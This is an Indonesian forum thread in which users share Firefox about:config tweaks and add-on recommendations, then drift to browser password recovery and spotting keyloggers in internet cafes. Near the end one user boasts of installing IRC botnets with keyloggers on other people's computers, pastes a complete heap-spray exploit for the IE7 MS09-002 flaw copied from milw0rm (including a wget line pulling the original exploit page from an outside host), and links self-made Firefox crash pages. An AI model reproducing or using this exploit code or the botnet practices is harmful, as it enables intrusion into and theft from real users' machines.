all about firefox, need expert and advance user

[kiriee]

plzzzz make this thread sticky

ayo bagi2 tips buat internet browser yang paling TOP ini selain gratis, firefox juga memberikan banyak banget option2 buat para user yg tangannya jahil, beserta dengan update2 yang terus berdatangan + addons yang tidak terhitung jumlahnya membuat browser ini sulit didepak browser lainnya:

jd wa mulai dolo yah tip2 buat para pengguna firefox:

~7 hidden pages on firefox

"about:" sama kaya popup yg muncul dimenu Help > about Mozilla firefox

"about:buildconfig" kaya info doang ini wa sendiri juga kurang jelas

"about:cache" memperlihatkan cache yang ad dimemory ram ama hardisk mu

"about:config" berisi option2 yang bisa lo ubah2 ato buat sendiri, hidden page paling penting

"aboutlugins" berisi daftar plugins yang ad dibrowser lo

"about:credits" isinya orang yang sudah berjasa dalam pembuatan firefox ini

"about:Mozilla" engga tau juga, mungkin ini alkitabnya mozilla

source:

Code:

http://www.pctipsbox.com/7-hidden-pages-for-firefox/

ini wa dapet dari

Code:

http://www.pctipsbox.com

The secrets of about:config :

Code:

http://www.pctipsbox.com/the-secrets-of-aboutconfig-part1/
http://www.pctipsbox.com/the-secrets-of-aboutconfig-part2/
http://www.pctipsbox.com/the-secrets-of-aboutconfig-part3/
http://www.pctipsbox.com/the-secrets-of-aboutconfig-part4/
http://www.pctipsbox.com/the-secrets-of-aboutconfig-part5/
http://www.pctipsbox.com/the-secrets-of-aboutconfig-part6/

isinya semua tentang about:config

sebelum utak atik confignya harap backup dolo
prefs.js, normalnya ad di:
\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\ .default\
matiin dolo firefoxnya, sebelum copy/paste/move/delete prefs.jsnya

ini favorite tweak gwa:
Start rendering pages faster

Creating an nglayout.initialpaint.delay integer preference lets you control how long Firefox waits before starting to render a page. If this value isn’t set, Firefox defaults to 250 milliseconds, or 0.25 of a second. Some people report that setting it to 0 i.e., forcing Firefox to begin rendering immediately causes almost all pages to show up faster. Values as high as 50 are also pretty snappy.

Open search results in a new tab

This one is a favorite of mine. When browser.search.openintab (a Boolean preference) is set to true, any searches launched from the Search tool bar are opened in a new tab instead of overwriting the contents of the current one.

Open bookmark groups in new tabs

If you open a group of bookmarks at once, Firefox’s default behavior is to replace any existing tabs with the newly opened pages. Set browser.tabs.loadFolderAndReplace (Boolean) to false, and opening groups of bookmarks will append new tabs to the existing window instead of overwriting existing ones.

http://www.indogamers.com/f393/mempe...firefox-73081/
percepat browsing dengan addons fasterfox, beberapa user mengaku hanya terjadi sedikit perbedaan saja dipeningkatan speed, beberapa lainnnya mala bilang lebih lambat, sharing needed
http://www.indogamers.com/f393/tutor...mozilla-48808/
warning: di pctipsbox bilang kalo beberapa website tidak menerima pipelining jd kemungkinan option bisa buat tambah cepet kemungkinan juga bisa aj buat tambah lambat

ADDONS:
yg da wa test
Adblock Plus:
ini termasuk 10 extension yang harus dihindari alasannya:
website bisa gratis gara2 iklan, nah kalo semua pake addons ini bisa2 website ga da yg gratis kan , tapi tetap aj ini addon yg top banget(must have)
Flashgot:
digunakan biar bisa saling berhubungan dengan download manager, juga dapat tambahan kaya download semua files yang ad dipages(must have)
FEBE:
buat backup extension/addons, history, bookmarks, dll
sebenernya ga penting2 amat soalnya, extension, bookmarks dll bisa dibackup manual, hanya saja addon ini mempermudah segalanya
Scrapbook:
entah kenapa kalo, fungsinya sama kaya save page as, tapi ini lebih komplet, buat pengguna speedy limitied berdasarkan jam, simpan sebanyak2nya bacanya nanti(must have)
reminderfox:
ga terlalu penting, buat ngingetin jadwal2 lo penting buat yg sering browsing dan sering lupa hal2 penting
Download status bar:
nampilin status download loe di bawah firefox diatas start menu, penting
soalnya kalo mesti buka 1 window baru cuman buat mantau proses download mengaggu banget(must have)
NoScript:
disable scripts java yg berbahaya, terkadang mendisable hal2 ga penting kaya tombol2 yg ad diforum ini semisal tombol qoute,code dll, da wa disable

WARNING:
jangan instal addons sembarangan, selain bakal memperlama waktu startup firefox ini juga bakal buat firefox nya ngelag2, jd pilih yang paling dibutuhkan,
note:kalo instal addons dia bakal nambain ato edit2 option yg ada di about:config dan itu ga bakaln kereset ulang walaupun addons dah diuninstal, jd sering2 backup prefs.jsnya


kalo ad yg saran2, kritik, pelaporan error/bugs laen tolong dipost, baik tentang addons maupun tweak2 about:config kalo bisa beserta penjelasannya, semoga thread ini tidak tenggelam

[clementine]

Spoiler untuk My Firefox Information :

Last updated: Thu, 31 Jul 2008 15:01:37 GMT
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1

Extensions (enabled: 26, disabled: 0; total: 26)

• Adblock Plus 0.7.5.5
• Adblock Plus: Element Hiding Helper 1.0.5
• ColorfulTabs 3.2
• CoLT 2.4.1
• CustomizeGoogle 0.72
• DownThemAll! 1.0.3
• FireShot 0.55
• Flashblock 1.5.6
• FlashGot 1.0.4.5
• Greasemonkey 0.8.20080609.0
• ImgLikeOpera Reloaded 0.7.1
• InfoLister 0.10
• Java Console 6.0.06
• KasKusMenu 2.8.1
• Nightly Tester Tools 2.0.2
• NoScript 1.7.7
• PDF Download 2.0.0.0
• QuickRestart 1.1.3
• Redirect Remover 2.5.5
• Splash 2.0.0.2
• Stylish 0.5.7
• Sxipper 2.1.3
• Tab Mix Plus 0.3.7pre.080721
• Text Link 2.0.2008052801
• Tweak Network 1.3
• URL Fixer 1.4.3

Themes (1)

• Default [selected]

Plugins

• Java(TM) Platform SE 6 U6
• Microsoft® DRM
• Mozilla Default Plug-in
• Shockwave Flash
• Windows Media Player Plug-in Dynamic Link Library

[klenkz]

thx artikelnya bos

[penggaris]

mo nanya bro, ini firefox gw tiap di double klik keluar box kyk gini molo , kenapa ya



terus memory usagenya pun 50mb ++ , dan kalo lagi buka page megaupload , maen dota nya jadi ngelag2 gitu..

[Black Zero]

Hmmm gw tambahin soal maxrequest yah bentar. Gw edit dolo postnya.

-reserved-

Btw, memory leak di firefox parah lo, jadi klo yang pake firefox 3 di kompie lelet, mendingan sering2 direstart firefoxnya.

[2easy4insane]

mozilla firefox bisa di hack lohh..
jadi klo kamu suka main ke warnet trus pake mozila jangan lupa Clear private data
klo gak bisa di hack pake program "PasswordFox" (gak tau password fox apa foxpassword)
bisa di download di Nirsoft

[FUCK_SENTINEL]

mozilla firefox bisa di hack lohh..
jadi klo kamu suka main ke warnet trus pake mozila jangan lupa Clear private data
klo gak bisa di hack pake program "PasswordFox" (gak tau password fox apa foxpassword)
bisa di download di Nirsoft

iaaa..tapi klo ada yang make keylog gmn ? percuma juga ente clear private data..mending deepfreeze dehh..

=D

[2easy4insane]

abis clear private data restart computer, un instal firefox nya

[bl00d13z]

iaaa..tapi klo ada yang make keylog gmn ? percuma juga ente clear private data..mending deepfreeze dehh..

=D

biasakan sebelum browsing ke site2 yang privasi.. pastikan sm sekali ga da keylogger hardware/software.. utk hardware bisa di cek di port PS2 keyboard kalo ada benda mencurigakan itu bisa jadi keqlogger berbentuk hardware.. kalo software gampang identifikasinya.. konsepnya menyimpan ke log file.. jadi coba buka command prompt dan sort list di tiap direktori (pake perintah dir) perhatikan besar kapasitas drivenya.. anda bikin file notepad kosong lalu ketikkan text asal hingga text2 yg dibuat menurut anda banyak..jgn save file txt tersebut.. tp cek kembali kapasitas drivenya.. indikasi terpasanga keylogger pasif antara lain kapasitas drive tempat anda membuat text akan bertambah dari yang sebelumnya (seharusnya tidak bertambah karena anda belum mensave-ny.Data masih ada di cache memory dan belum tersimpan dalam hdd).. kalo dah gtu mnding ga usa browsing. dijamin tu warnet pasang keylogger pasif.. beda kalo keylogger yang aktif, dalam hal ini log tidak disimpan di drive korban melainkan ditransfer via jaringan.. kalo ini identifikasinya lewat port2 yang terbuka.. pastikan tidak ada port2 mencurigakan yang dalam keadaan 'established' selain port2 service bawaan windows (135,139,445) atau port2 system billing dan antivirus.. cara ceknya bisa lewat command prompt dengan mengetikkan netstat -an

lebih bahaya lagi kalo tu net pasang sniffer (teknik untuk menyadap paket di jaringan) hancur sudah privasi anda.. passwrd game ja bs ketangkep!!.. tar lagi deh bahasnya.. jarang klo yg ini.. bisa cek di arp table cara nanggulanginnya..

[2easy4insane]

key logger itu program bukan kk?

[bl00d13z]

key logger itu program bukan kk?

uda termasuk golongan spyware..tapi bicara legal dan illegalnya relatif.

ada 2 jenis keylogger.. yg hardware(USB/PS2 keylogger) ma software.. cth yg software : KGB keylogger, fearless key spy, dll), worm botnet/trojan2 juga biasanya selalu ada fungsi keylog jika yang punya trojan membutuhkan tgl diaktifin...

[Siaunen2]

biasakan sebelum browsing ke site2 yang privasi.. pastikan sm sekali ga da keylogger hardware/software.. utk hardware bisa di cek di port PS2 keyboard kalo ada benda mencurigakan itu bisa jadi keqlogger berbentuk hardware.. kalo software gampang identifikasinya.. konsepnya menyimpan ke log file.. jadi coba buka command prompt dan sort list di tiap direktori (pake perintah dir) perhatikan besar kapasitas drivenya.. anda bikin file notepad kosong lalu ketikkan text asal hingga text2 yg dibuat menurut anda banyak..jgn save file txt tersebut.. tp cek kembali kapasitas drivenya.. indikasi terpasanga keylogger pasif antara lain kapasitas drive tempat anda membuat text akan bertambah dari yang sebelumnya (seharusnya tidak bertambah karena anda belum mensave-ny.Data masih ada di cache memory dan belum tersimpan dalam hdd).. kalo dah gtu mnding ga usa browsing. dijamin tu warnet pasang keylogger pasif.. beda kalo keylogger yang aktif, dalam hal ini log tidak disimpan di drive korban melainkan ditransfer via jaringan.. kalo ini identifikasinya lewat port2 yang terbuka.. pastikan tidak ada port2 mencurigakan yang dalam keadaan 'established' selain port2 service bawaan windows (135,139,445) atau port2 system billing dan antivirus.. cara ceknya bisa lewat command prompt dengan mengetikkan netstat -an

lebih bahaya lagi kalo tu net pasang sniffer (teknik untuk menyadap paket di jaringan) hancur sudah privasi anda.. passwrd game ja bs ketangkep!!.. tar lagi deh bahasnya.. jarang klo yg ini.. bisa cek di arp table cara nanggulanginnya..

Untuk cek ukuran hdd jelas ga valid..... ukuran hdd jelas brubah ubah terutama oleh karena adanya caching.
Keylogger ngapain d pasang lewat jaringan? Lagian km ketik netstat juga banyak port yang tersambung meskipun bukan system billing dkk, yang admin web/labkom/yang sering norrent pasti tau.
Sniffer pasang di gateway katakanlah. Terus maw d apain? Segitu banyak paket, kalo d dalem bilik tertentu kita gk tau itu dia buka app/web apa yang ***** dgn internet. Maw d cek satu2? Bisa gila.
Solusi terbaik adalah gunakan komputer anda sendiri, jaringan anda sendiri dan anda harus yakin kalo semoa sudah dalam kontrol anda, gk ada keylogger/paket sniffer dkk. Pilih net yang udah terpercaya gk ada keyloggernya.

[bl00d13z]

Untuk cek ukuran hdd jelas ga valid..... ukuran hdd jelas brubah ubah terutama oleh karena adanya caching.
Keylogger ngapain d pasang lewat jaringan? Lagian km ketik netstat juga banyak port yang tersambung meskipun bukan system billing dkk, yang admin web/labkom/yang sering norrent pasti tau.
Sniffer pasang di gateway katakanlah. Terus maw d apain? Segitu banyak paket, kalo d dalem bilik tertentu kita gk tau itu dia buka app/web apa yang ***** dgn internet. Maw d cek satu2? Bisa gila.
Solusi terbaik adalah gunakan komputer anda sendiri, jaringan anda sendiri dan anda harus yakin kalo semoa sudah dalam kontrol anda, gk ada keylogger/paket sniffer dkk. Pilih net yang udah terpercaya gk ada keyloggernya.

wes... cache itu tempat penyimpanan sementara mas(buka lagi de buku arsitektur komp ny) silahkan dicoba mas ketik seabreg2 di notepad 'tanpa disave'..gw jamin ga bakal nambah tu kapasitas hdd ny kalo ga terpasang keylog ...

netstat itu berguna banget.. default port spyware dan trojan tidak mungkin bentrok dgn service2 standard, setiap aplikasi jaringan pasti memiliki default port yg digunakan (meskipun bisa diubah untuk mengecoh),setidaknya dengan tau mana port2 billing, downloader, dan service2 standa,.kita bisa menganalisa sendiri mana port yang dicurigai dan tidak.

wah saya malah lebis suka pasang keylog yg aktif tu.. gw sk pke botnet2 via IRC yg ad function keylognya tuh.. mala lebih efisien yg lwt jaringan transfer datanya.. gw bisa awasin komp yg gw uda pasang botnet tanpa halangan IP private..

wah ga pro ah sniffingnya... mana ada orang mau baca paket sama raw2nya.. di filter donk mas.... gw sering klo masalah snif, ga da kerjaan banget klo sniffing ga difilter..

[2easy4insane]

kebanyakan browser buat internet udah ada yg ngehack

internet explore juga bisa di hack loh pake ie password

sama download di nirsoft

klo google chrome gw baca di majalah chip gak aman

trus yg gw denger-denger

anak di jepang sekitar kelas 3 sd bisa ngejebol website google !

[bl00d13z]

kebanyakan browser buat internet udah ada yg ngehack

internet explore juga bisa di hack loh pake ie password

sama download di nirsoft

klo google chrome gw baca di majalah chip gak aman

trus yg gw denger-denger

anak di jepang sekitar kelas 3 sd bisa ngejebol website google !

wah IE ma jgn ditanya.. exploitnya betebaran :

nih buffer overflow wat IE7 gw copas dr milw***:

Code:

<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/.../mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
-->

<script language="JavaScript">

var c="putyourshizhere-unescaped";

var array = new Array(); 

var ls = 0x100000-(c.length*2+0x01020); 

var b = unescape("%u0C0Cఌ"); 
while(b.length<ls/2) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 

for(i=0; i<0xC0; i++) { 
	array[i] = lh + c;
} 

CollectGarbage();

var s1=unescape("ଋଋAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() { 
	o1=document.createElement("tbody"); 
	o1.click; 
	var o2 = o1.cloneNode();	
	o1.clearAttributes(); 
	o1=null; CollectGarbage(); 
	for(var x=0;x<a1.length;x++) a1[x].src=s1; 
	o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>

# milw0rm.com [2009-02-18]

n ini buffer over wat firefox3 :
bisa dicoba ndri linkny..matiin addon no script trlbh dahulu klo mo liat reaksiny (sory ga gw kasi source codeny..bs dliat manual ko)

http://h1.ripway.com/07121985/cr45h.html (yg ni bkinan gw)

http://h1.ripway.com/07121985/cr4545sh.html (yg ni modifan dkit..)

klo mo coba coba ja klik..cuma stuck doank ko firefoxny ga gw tanem macem2..(AV ny kan pd yahut2 ini)


jgnkan google.. baru2 ini salah satu framework untuk melakukan ekploitasi terhadap berbagai vulnerabillities (metasploit) di deface..
lengkapnya bisa baca disini http://e-rdc.org/v1/news.php?readmore=93

kasarnya "situs hacker malah ke hack.."